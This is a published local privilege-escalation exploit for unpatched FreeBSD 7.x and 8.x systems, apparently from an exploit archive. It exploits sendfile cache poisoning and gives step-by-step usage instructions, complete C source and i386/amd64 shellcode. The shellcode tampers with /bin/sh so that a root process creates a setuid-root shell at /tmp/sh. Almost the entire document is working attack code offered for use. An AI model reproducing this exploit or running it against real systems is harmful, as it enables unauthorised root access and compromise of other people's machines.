# Title : FreeBSD mbufs() sendfile Cache Poisoning Privilege Escalation
# Published : 2010-08-19
# Author : Kingcope
/* freebsd x86/x64 sendfile cache local root xpl v2
by Kingcope
2010
--
should work against any unpatched FreeBSD 8.* or 7.* system (the fix shipped 12 Jul 2010;
systems updated after that date are not affected)
tampers with /bin/sh so that it contains a payload which, once some root process runs
the shell, does (in this order, see the syscall numbers in the shellcode below):
'
chown 0:0 /tmp/sh
chmod 06755 /tmp/sh   (setuid + setgid + world-executable)
execve /tmp/sh2       (the untouched copy, so the caller still gets a shell)
'
how to use:
terminal 1:
$ cp /bin/sh /tmp/sh
$ cp /bin/sh /tmp/sh2
$ gcc cache.c -o cache
terminal 2:
$ nc -l 7030
terminal 1:
for i386 arch type:
$ ./cache i386
for amd64 arch type:
$ ./cache amd64
now wait: the payload fires the next time a root-owned process executes /bin/sh
(the author reports this takes ~5 minutes)
then do:
$ /tmp/sh
#
cleanup (run as root; restores /bin/sh from the untouched copy made in step 1):
# cp -f /tmp/sh2 /bin/sh
#
enjoy the root shell! (note: /tmp/sh is now a world-executable setuid-root binary that
any local user can run -- remove it as soon as you are done)
*/
// this juarez is now private on #darknet --
// http://www.youtube.com/watch?v=JtgInqNNpCI
// http://www.youtube.com/watch?v=IdbRWrY4QBI
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/stat.h>
#include <sys/uio.h>

#include <netinet/in.h>
#include <arpa/inet.h>

#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
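/*
 * Architecture selector.  The values are internal only; the original code
 * used 1 for i386, 2 for amd64 and 3 for "not given / unknown".
 */
enum { ARCH_I386 = 1, ARCH_AMD64 = 2, ARCH_UNKNOWN = 3 };

/* Sizes used when building the payload and the per-round sendfile() burst. */
enum {
	PAYLOAD_BUF = 10000,	/* scratch buffer the payload is built in */
	SLED_I386   = 256,	/* NOP sled length in front of the i386 code */
	SLED_AMD64  = 100,	/* NOP sled length in front of the amd64 code */
	CHUNK       = 2048	/* bytes of /bin/sh pushed through sendfile() per round */
};

/*
 * i386 payload (FreeBSD int 0x80 ABI: arguments pushed right-to-left plus one
 * dummy push, syscall number in %al).  It performs:
 *   chown("/tmp/sh", 0, 0);        syscall 16
 *   chmod("/tmp/sh", 06755);       syscall 15 (0xded)
 *   execve("/tmp/sh2", ...);       syscall 59
 * The page this listing came from had the backslash of every "\x.." escape
 * stripped ("x31xc0..."); the escapes are restored here.
 */
static const char str32[] =
	"\x31\xc0\x6a\x00\x68\x70\x2f\x73\x68\x68\x2f\x2f\x74\x6d\x89\xe3"
	"\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f"
	"\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d"
	"\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";

/*
 * amd64 payload (FreeBSD syscall ABI, number in %rax, args in rdi/rsi/rdx).
 * Same three calls as the i386 version: chown(16), chmod(15), execve(59).
 */
static const char str64[] =
	"\x48\x31\xc0\x99\xb0\x10\x48\xbf\xff\x2f\x74\x6d\x70\x2f\x73\x68"
	"\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05"
	"\xb0\x0f\x48\x31\xf6\x66\xbe\xed\x0d\x0f\x05\x48\x31\xc0\x99\xb0"
	"\x3b\x48\xbf\x2f\x74\x6d\x70\x2f\x73\x68\x32\x6a\x00\x57\x48\x89"
	"\xe7\x57\x52\x48\x89\xe6\x0f\x05";

/* Map the command-line architecture word to an ARCH_* value. */
static int
parse_arch(const char *word)
{
	if (strcmp(word, "i386") == 0)
		return ARCH_I386;
	if (strcmp(word, "amd64") == 0)
		return ARCH_AMD64;
	return ARCH_UNKNOWN;
}

/*
 * Fill buf with the payload for arch: the whole buffer is first padded with
 * spaces, then a NOP sled (0x90) followed by the shellcode including its
 * trailing NUL is written at the front (the original sent sizeof str, i.e.
 * the NUL too, so that is preserved).
 *
 * Returns the number of bytes that must be sent (sled + shellcode + NUL),
 * or 0 if arch is unknown or buflen is too small to hold the payload.
 */
static size_t
build_payload(int arch, char *buf, size_t buflen)
{
	const char *code;
	size_t codelen, sled;

	switch (arch) {
	case ARCH_I386:
		code = str32;
		codelen = sizeof str32;
		sled = SLED_I386;
		break;
	case ARCH_AMD64:
		code = str64;
		codelen = sizeof str64;
		sled = SLED_AMD64;
		break;
	default:
		return 0;
	}
	if (buflen < sled + codelen)
		return 0;

	memset(buf, ' ', buflen);
	memset(buf, 0x90, sled);
	memcpy(buf + sled, code, codelen);
	return sled + codelen;
}

/*
 * Entry point.  Usage: ./cache i386|amd64, with a listener on 127.0.0.1:7030
 * (terminal 2: nc -l 7030) already running.
 *
 * The loop alternates two steps until st_size bytes have been accounted for:
 *   1. write the NOP-sled + shellcode payload to the socket;
 *   2. push CHUNK bytes of /bin/sh through FreeBSD's sendfile(2) from a fixed
 *      file offset (4096 on i386, 7224 on amd64), which is what the cache
 *      poisoning relies on.  The offsets are taken verbatim from the original
 *      and are presumably inside the shell's text segment -- not verifiable here.
 *
 * Exits non-zero on usage error and on any setup failure (the original only
 * warned and went on, which with an unopened /bin/sh left `size` uninitialised).
 */
int
main(int argc, char *argv[])
{
	struct sockaddr_in addr;
	struct stat sb;
	char buf[PAYLOAD_BUF];
	fd_set wset;
	int64_t size;
	off_t sbytes, off;
	size_t plen;
	int s, f, flags, arch;
	int chunk = 0;		/* bytes of the current sendfile() burst still to go */

	if (argc != 2 || (arch = parse_arch(argv[1])) == ARCH_UNKNOWN) {
		printf("define architecture i386 or amd64\n");
		return 1;
	}
	/* sendfile() source offset into /bin/sh, fixed per architecture. */
	off = (arch == ARCH_I386) ? 2048 * 2 : 1204 * 6;

	/* Connect to the local listener that absorbs the traffic. */
	s = socket(AF_INET, SOCK_STREAM, 0);
	if (s < 0)
		err(1, "socket");
	memset(&addr, 0, sizeof addr);
	addr.sin_family = AF_INET;
	addr.sin_port = htons(7030);
	addr.sin_addr.s_addr = inet_addr("127.0.0.1");
	if (connect(s, (struct sockaddr *)&addr, sizeof addr) < 0)
		err(1, "fail to connect");

	f = open("/bin/sh", O_RDONLY);
	if (f < 0)
		err(1, "fail to open file");
	if (fstat(f, &sb) < 0)
		err(1, "fstat failed");
	size = sb.st_size;

	/* The file descriptor is made non-blocking, as in the original. */
	flags = fcntl(f, F_GETFL);
	if (flags < 0 || fcntl(f, F_SETFL, flags | O_NONBLOCK) < 0)
		err(1, "fcntl");

	while (size > 0) {
		FD_ZERO(&wset);
		FD_SET(s, &wset);
		/* nfds is one past the highest descriptor in the set: s, not f. */
		if (select(s + 1, NULL, &wset, NULL, NULL) < 0)
			continue;	/* e.g. EINTR: just retry */

		if (chunk > 0) {
			int r;

			sbytes = 0;
			/* FreeBSD 7-argument sendfile(2); sbytes gets the byte count. */
			r = sendfile(f, s, off, chunk, NULL, &sbytes, 0);
			if (r < 0) {
				/* Transient: retry the same burst. Anything else (EPIPE
				 * once the listener is gone, EBADF, ...) would otherwise
				 * spin here forever. */
				if (errno == EAGAIN || errno == EINTR)
					continue;
				err(1, "sendfile");
			}
			chunk -= sbytes;
			size -= sbytes;
			continue;
		}

		/* Start a new round: payload first, then CHUNK bytes of the file. */
		chunk = CHUNK;
		plen = build_payload(arch, buf, sizeof buf);
		if (write(s, buf, plen) != (ssize_t)plen)
			err(1, "write");
	}

	close(f);
	close(s);
	return 0;
}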